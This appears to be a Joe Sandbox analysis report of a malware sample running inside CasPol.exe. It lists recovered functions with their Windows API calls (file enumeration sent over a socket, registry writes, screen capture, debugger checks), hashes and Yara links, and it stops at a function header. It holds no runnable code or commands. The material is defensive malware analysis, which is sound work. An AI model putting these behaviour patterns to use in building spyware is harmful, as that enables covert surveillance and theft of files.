                                                                                                            Function 00406AC2 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 86fileCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00406ADD
                                                                                                            • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00406BA5
                                                                                                              • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: FileFind$FirstNextsend
                                                                                                            • String ID: x@G$x@G
                                                                                                            • API String ID: 4113138495-3390264752
                                                                                                            • Opcode ID: 9e42d4624aa1081e31404d699729e015607263420c2313147d1fc57e1445648b
                                                                                                            • Instruction ID: 9df0c8526107c53e8273efc1e688d8f669138e67c86485f4ac558c26d22f9560
                                                                                                            • Opcode Fuzzy Hash: 9e42d4624aa1081e31404d699729e015607263420c2313147d1fc57e1445648b
                                                                                                            • Instruction Fuzzy Hash: B42147725043015BC714FB61D8959AF77A8AFD1358F40093EF996A31D1EF38AA088A9B
                                                                                                            Function 0041BB77 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 83COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041BC6C
                                                                                                              • Part of subcall function 004126D2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004126E1
                                                                                                              • Part of subcall function 004126D2: RegSetValueExA.KERNEL32(?,HgF,00000000,?,00000000,00000000,004742F8,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412709
                                                                                                              • Part of subcall function 004126D2: RegCloseKey.KERNEL32(?,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412714
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseCreateInfoParametersSystemValue
                                                                                                            • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                                                                                            • API String ID: 4127273184-3576401099
                                                                                                            • Opcode ID: f4ba7aec24a953ef4b92a26ea97f229a08492362b077529f009aa708e5b31fc0
                                                                                                            • Instruction ID: a6c166168c7895b99543370299e99232025f4d6daba66cbb636fef562e17b9dc
                                                                                                            • Opcode Fuzzy Hash: f4ba7aec24a953ef4b92a26ea97f229a08492362b077529f009aa708e5b31fc0
                                                                                                            • Instruction Fuzzy Hash: 06112432B8060433D514303A4E6FBAE1806D356B60FA4415FF6026A6DAFA9E5AE103DF
                                                                                                            Function 00450A7F Relevance: 6.2, APIs: 4, Instructions: 236COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                              • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
                                                                                                              • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                                              • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
                                                                                                              • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                                            • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00443CF3,?,?,?,?,?,?,00000004), ref: 00450B61
                                                                                                            • _wcschr.LIBVCRUNTIME ref: 00450BF1
                                                                                                            • _wcschr.LIBVCRUNTIME ref: 00450BFF
                                                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,00443CF3,00000000,00443E13), ref: 00450CA2
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                                                                                                            • String ID:
                                                                                                            • API String ID: 4212172061-0
                                                                                                            • Opcode ID: 11e9d858be2eef57e51fe3ee5abaff11ba74f3cf781d1ad02b19bd3dc5989495
                                                                                                            • Instruction ID: a02e79dc60b90d06ce6287b0e519d5a2a37574338541b46fb9e412c2f7ec0900
                                                                                                            • Opcode Fuzzy Hash: 11e9d858be2eef57e51fe3ee5abaff11ba74f3cf781d1ad02b19bd3dc5989495
                                                                                                            • Instruction Fuzzy Hash: D7613B79600306AAD729AB75CC82AAB73ACEF05316F14052FFD05D7243E778E909C768
                                                                                                            Function 00408DA7 Relevance: 6.2, APIs: 4, Instructions: 206fileCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • __EH_prolog.LIBCMT ref: 00408DAC
                                                                                                            • FindFirstFileW.KERNEL32(00000000,?), ref: 00408E24
                                                                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 00408E4D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: FileFind$FirstH_prologNext
                                                                                                            • String ID:
                                                                                                            • API String ID: 301083792-0
                                                                                                            • Opcode ID: 0b43960f9993051d9431381d87604967d53f88331668a9e606d8c6ddd84d18a2
                                                                                                            • Instruction ID: 60446431aa0b45b5fc099c057f6d50f3e7887136e12703af2d86415be67689ac
                                                                                                            • Opcode Fuzzy Hash: 0b43960f9993051d9431381d87604967d53f88331668a9e606d8c6ddd84d18a2
                                                                                                            • Instruction Fuzzy Hash: 357140328001099BCB15EBA1DC919EE7778AF54318F10427FE856B71E2EF386E45CB98
                                                                                                            Function 00450E6A Relevance: 4.7, APIs: 3, Instructions: 205COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                              • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
                                                                                                              • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                                              • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
                                                                                                              • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                                              • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446F1E
                                                                                                              • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F2B
                                                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450EBE
                                                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450F0F
                                                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450FCF
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ErrorInfoLastLocale$_free$_abort
                                                                                                            • String ID:
                                                                                                            • API String ID: 2829624132-0
                                                                                                            • Opcode ID: 022617d048d67c565bd8cd478daba609af81f9e307d0efc84ddd0a3e182c2dec
                                                                                                            • Instruction ID: e92eb603d23812efeda5bde14236c6fbce748c008cf001f3fb8de25b7fcb8669
                                                                                                            • Opcode Fuzzy Hash: 022617d048d67c565bd8cd478daba609af81f9e307d0efc84ddd0a3e182c2dec
                                                                                                            • Instruction Fuzzy Hash: AC61D3365002079FDB289F24CD82BBB77A8EF04706F1041BBED05C6696E778D989DB58
                                                                                                            Function 0043A65D Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • IsDebuggerPresent.KERNEL32(?,?,?,?,?,0000000A), ref: 0043A755
                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,0000000A), ref: 0043A75F
                                                                                                            • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,0000000A), ref: 0043A76C
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                            • String ID:
                                                                                                            • API String ID: 3906539128-0
                                                                                                            • Opcode ID: 3fa352bae2dd0906ed67bad857870cf194ce26166e1b5da63b4ea542d53f5057
                                                                                                            • Instruction ID: 15fc2c217458336097e8e19d69e2940e7c5a4b77666d4e23b7e272f62fea865b
                                                                                                            • Opcode Fuzzy Hash: 3fa352bae2dd0906ed67bad857870cf194ce26166e1b5da63b4ea542d53f5057
                                                                                                            • Instruction Fuzzy Hash: 2D31D47490121CABCB21DF64D98979DBBB8BF08310F5052EAE81CA7251E7349F81CF49
                                                                                                            Function 00442554 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetCurrentProcess.KERNEL32(?,?,0044252A,?,0046DAE0,0000000C,00442681,?,00000002,00000000), ref: 00442575
                                                                                                            • TerminateProcess.KERNEL32(00000000,?,0044252A,?,0046DAE0,0000000C,00442681,?,00000002,00000000), ref: 0044257C
                                                                                                            • ExitProcess.KERNEL32 ref: 0044258E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Process$CurrentExitTerminate
                                                                                                            • String ID:
                                                                                                            • API String ID: 1703294689-0
                                                                                                            • Opcode ID: 7c471b5b7a391410b3ce269feae26e49b4a02911a71997b74fd7744fcc246e6d
                                                                                                            • Instruction ID: 6e58600c80f72e94ca833af3256d2da28fe7ef7edb4b61bff2e48710a34f1207
                                                                                                            • Opcode Fuzzy Hash: 7c471b5b7a391410b3ce269feae26e49b4a02911a71997b74fd7744fcc246e6d
                                                                                                            • Instruction Fuzzy Hash: 65E08C31004648BFDF016F14EE18A893F29EF10346F408475F80A8A632CFB9DE92CB88
                                                                                                            Function 0044D5E9 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: .
                                                                                                            • API String ID: 0-248832578
                                                                                                            • Opcode ID: abd6fd6b538380b102c55790d6b56a2ac58ff5115e1efa51d285ee8eb71cff1a
                                                                                                            • Instruction ID: db76f937e81630575b2700384d205b0ac401e8f874fa32e43cac1aabc581782c
                                                                                                            • Opcode Fuzzy Hash: abd6fd6b538380b102c55790d6b56a2ac58ff5115e1efa51d285ee8eb71cff1a
                                                                                                            • Instruction Fuzzy Hash: CB310471900209AFEB249E79CC84EEB7BBDDB86318F1101AEF91897251E6389D458B64
                                                                                                            Function 00450D42 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                              • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
                                                                                                              • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                                              • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
                                                                                                              • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                                            • EnumSystemLocalesW.KERNEL32(00450E6A,00000001,00000000,?,<D,?,00451497,00000000,?,?,?), ref: 00450DB4
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                            • String ID: <D
                                                                                                            • API String ID: 1084509184-3866323178
                                                                                                            • Opcode ID: 99518e0148a584110f8bf4689e731d5402797eff59b4f7bbd4ab81c0230e503e
                                                                                                            • Instruction ID: b1cdb4a87285138648e71eec5b58018a028c0508cbf90fbfa4a5e64eba390ba2
                                                                                                            • Opcode Fuzzy Hash: 99518e0148a584110f8bf4689e731d5402797eff59b4f7bbd4ab81c0230e503e
                                                                                                            • Instruction Fuzzy Hash: 9C11293B2007055FDB189F79D8916BAB7A1FF8031AB14442DE94647741D375B846C744
                                                                                                            Function 00450DDD Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                              • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
                                                                                                              • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                                              • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
                                                                                                              • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                                            • EnumSystemLocalesW.KERNEL32(004510BA,00000001,?,?,<D,?,0045145B,<D,?,?,?,?,?,00443CEC,?,?), ref: 00450E29
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                            • String ID: <D
                                                                                                            • API String ID: 1084509184-3866323178
                                                                                                            • Opcode ID: e0c48b72e2c1269c4cdc51d0e461bd75820cdd7fcb75359b91497d16354a5322
                                                                                                            • Instruction ID: d323619e2976bd52c5edaa4f55efd93dda7e8b303aa23e489220a9c0c916f3e4
                                                                                                            • Opcode Fuzzy Hash: e0c48b72e2c1269c4cdc51d0e461bd75820cdd7fcb75359b91497d16354a5322
                                                                                                            • Instruction Fuzzy Hash: 5BF0223A2003045FDB145F3AD882AAB7B95EF81729B25842EFD058B782D275AC42C644
                                                                                                            Function 00447597 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,?,?,00000004), ref: 004475EA
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: InfoLocale
                                                                                                            • String ID: GetLocaleInfoEx
                                                                                                            • API String ID: 2299586839-2904428671
                                                                                                            • Opcode ID: 8dab955c83ead38f4190d8cd68b3baa1d28bcda2227728d0cef18aa89ebed625
                                                                                                            • Instruction ID: 80a81796b135a3e0eaabc3ca7fb48afb6b687e063e78a0117ef0368584b3b56e
                                                                                                            • Opcode Fuzzy Hash: 8dab955c83ead38f4190d8cd68b3baa1d28bcda2227728d0cef18aa89ebed625
                                                                                                            • Instruction Fuzzy Hash: 82F0F031A44308BBDB11AF61EC06F6E7B25EF04712F00416AFC046A2A2CB359E11969E
                                                                                                            Function 004510BA Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                              • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
                                                                                                              • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                                              • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
                                                                                                              • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                                              • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446F1E
                                                                                                              • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F2B
                                                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0045110E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLast$_free$InfoLocale_abort
                                                                                                            • String ID:
                                                                                                            • API String ID: 1663032902-0
                                                                                                            • Opcode ID: 9286f156abac91c7ed9d9ee6f3e5b08bc3c26a4b89b9db52a82557d4143127a2
                                                                                                            • Instruction ID: 725ff80feb3504da526bb6f16fdbe645276de1ecdd37ac2f1e7666d8a95350e0
                                                                                                            • Opcode Fuzzy Hash: 9286f156abac91c7ed9d9ee6f3e5b08bc3c26a4b89b9db52a82557d4143127a2
                                                                                                            • Instruction Fuzzy Hash: 2D21B332500606ABDB249A25DC46B7B73A8EB09316F1041BBFE01C6252EB79DD48CB99
                                                                                                            Function 004512EA Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                              • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
                                                                                                              • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                                              • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
                                                                                                              • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                                            • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00451088,00000000,00000000,?), ref: 00451316
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLast$InfoLocale_abort_free
                                                                                                            • String ID:
                                                                                                            • API String ID: 2692324296-0
                                                                                                            • Opcode ID: b6b1206c8d774c000a1b4b507e47eef55c4aaf57ff81984432bbf3fd36f42e7a
                                                                                                            • Instruction ID: 964a9937ac5a020d26487979adcc3deadbef587b10f76395f6381cc8137ce6dd
                                                                                                            • Opcode Fuzzy Hash: b6b1206c8d774c000a1b4b507e47eef55c4aaf57ff81984432bbf3fd36f42e7a
                                                                                                            • Instruction Fuzzy Hash: 10F07D32500111BBEB286A25CC16BFF7758EB00716F15046BEC06A3651FA38FD49C6D4
                                                                                                            Function 004470AE Relevance: 1.5, APIs: 1, Instructions: 34COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                              • Part of subcall function 00444ACC: EnterCriticalSection.KERNEL32(-00471558,?,0044225B,00000000,0046DAC0,0000000C,00442216,0000000A,?,?,00448739,0000000A,?,00446F74,00000001,00000364), ref: 00444ADB
                                                                                                            • EnumSystemLocalesW.KERNEL32(00447068,00000001,0046DC48,0000000C), ref: 004470E6
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                            • String ID:
                                                                                                            • API String ID: 1272433827-0
                                                                                                            • Opcode ID: 294c88a1965c44704c377604ff0a5917817e93c6b6b84f866ad5a3c5a2dedf6a
                                                                                                            • Instruction ID: 877f7ae5c491a2fbf36f534f7b8138893028b6a81f24f5c3744eb9f6a7677366
                                                                                                            • Opcode Fuzzy Hash: 294c88a1965c44704c377604ff0a5917817e93c6b6b84f866ad5a3c5a2dedf6a
                                                                                                            • Instruction Fuzzy Hash: F6F04932A10200EFEB04EF68E806B4D77B0EB44725F10816AF414DB2E2DB7889818B49
                                                                                                            Function 00450CF7 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                              • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
                                                                                                              • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                                              • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
                                                                                                              • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                                            • EnumSystemLocalesW.KERNEL32(00450C4E,00000001,?,?,?,004514B9,<D,?,?,?,?,?,00443CEC,?,?,?), ref: 00450D2E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                            • String ID:
                                                                                                            • API String ID: 1084509184-0
                                                                                                            • Opcode ID: 8c2bccbfd0fc102635c006ca31f830fd57f68f19690e6c985b1f52cdbb333b18
                                                                                                            • Instruction ID: ec648f77c102ae861fabd43d141f98194b25f4d0b1f390d0839222eb7000fb0b
                                                                                                            • Opcode Fuzzy Hash: 8c2bccbfd0fc102635c006ca31f830fd57f68f19690e6c985b1f52cdbb333b18
                                                                                                            • Instruction Fuzzy Hash: CBF05C3D30020557CB159F35D81576B7F94EFC2711B07405AFE098B381C239D846C754
                                                                                                            Function 00433CD7 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(Function_00033CE3,004339B1), ref: 00433CDC
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ExceptionFilterUnhandled
                                                                                                            • String ID:
                                                                                                            • API String ID: 3192549508-0
                                                                                                            • Opcode ID: 3670727f3e8651977646328ecd403d2a1b3c6ba49dd5bfb528ab2007e995f695
                                                                                                            • Instruction ID: 83953e3dca8a62111c248ad4478ddd9c1373f985a30770e5fc8846644fe13ce9
                                                                                                            • Opcode Fuzzy Hash: 3670727f3e8651977646328ecd403d2a1b3c6ba49dd5bfb528ab2007e995f695
                                                                                                            • Instruction Fuzzy Hash:
                                                                                                            Function 0044E92E Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: HeapProcess
                                                                                                            • String ID:
                                                                                                            • API String ID: 54951025-0
                                                                                                            • Opcode ID: c4eeb5daf7d20212f04cf1a35fe49476965deb7007d4ee0647dc212291e34da0
                                                                                                            • Instruction ID: 9504a653bcf427532d5064532c05f1d04939bb5561e35e6535c2a7eba45b7a60
                                                                                                            • Opcode Fuzzy Hash: c4eeb5daf7d20212f04cf1a35fe49476965deb7007d4ee0647dc212291e34da0
                                                                                                            • Instruction Fuzzy Hash: 84A00270506201CB57404F756F0525937D9654559170580755409C5571D62585905615
                                                                                                            Function 00417F9F Relevance: 51.1, APIs: 28, Strings: 1, Instructions: 324windowmemoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00417FB9
                                                                                                            • CreateCompatibleDC.GDI32(00000000), ref: 00417FC4
                                                                                                              • Part of subcall function 00418452: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00418482
                                                                                                            • CreateCompatibleBitmap.GDI32(?,00000000), ref: 00418045
                                                                                                            • DeleteDC.GDI32(?), ref: 0041805D
                                                                                                            • DeleteDC.GDI32(00000000), ref: 00418060
                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 0041806B
                                                                                                            • StretchBlt.GDI32(00000000,00000000,00000000,00000000,?,?,?,?,00000000,?,00CC0020), ref: 00418093
                                                                                                            • GetIconInfo.USER32(?,?), ref: 004180CB
                                                                                                            • DeleteObject.GDI32(?), ref: 004180FA
                                                                                                            • DeleteObject.GDI32(?), ref: 00418107
                                                                                                            • DrawIcon.USER32(00000000,?,?,?), ref: 00418114
                                                                                                            • BitBlt.GDI32(00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00660046), ref: 00418144
                                                                                                            • GetObjectA.GDI32(?,00000018,?), ref: 00418173
                                                                                                            • LocalAlloc.KERNEL32(00000040,00000028), ref: 004181BC
                                                                                                            • LocalAlloc.KERNEL32(00000040,00000001), ref: 004181DF
                                                                                                            • GlobalAlloc.KERNEL32(00000000,?), ref: 00418248
                                                                                                            • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0041826B
                                                                                                            • DeleteDC.GDI32(?), ref: 0041827F
                                                                                                            • DeleteDC.GDI32(00000000), ref: 00418282
                                                                                                            • DeleteObject.GDI32(00000000), ref: 00418285
                                                                                                            • GlobalFree.KERNEL32(00CC0020), ref: 00418290
                                                                                                            • DeleteObject.GDI32(00000000), ref: 00418344
                                                                                                            • GlobalFree.KERNEL32(?), ref: 0041834B
                                                                                                            • DeleteDC.GDI32(?), ref: 0041835B
                                                                                                            • DeleteDC.GDI32(00000000), ref: 00418366
                                                                                                            • DeleteDC.GDI32(?), ref: 00418398
                                                                                                            • DeleteDC.GDI32(00000000), ref: 0041839B
                                                                                                            • DeleteObject.GDI32(?), ref: 004183A1
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Delete$Object$AllocCreateGlobal$CompatibleFreeIconLocal$BitmapBitsDisplayDrawEnumInfoSelectSettingsStretch
                                                                                                            • String ID: DISPLAY
                                                                                                            • API String ID: 1765752176-865373369
                                                                                                            • Opcode ID: 54e54478d3a93c6a48e505b633be5783707cf85144324253bebfee7b4c7dea2f
                                                                                                            • Instruction ID: f05cd178694609e891ba83f5bdf02bb76ea447df34f4969275af8919d08089d1
                                                                                                            • Opcode Fuzzy Hash: 54e54478d3a93c6a48e505b633be5783707cf85144324253bebfee7b4c7dea2f
                                                                                                            • Instruction Fuzzy Hash: 12C17C31508345AFD3209F25DC44BABBBE9FF88751F04082EF989932A1DB34E945CB5A
                                                                                                            Function 00417245 Relevance: 47.5, APIs: 22, Strings: 5, Instructions: 290libraryloaderthreadCOMMON
                                                                                                            Download Yara Rule
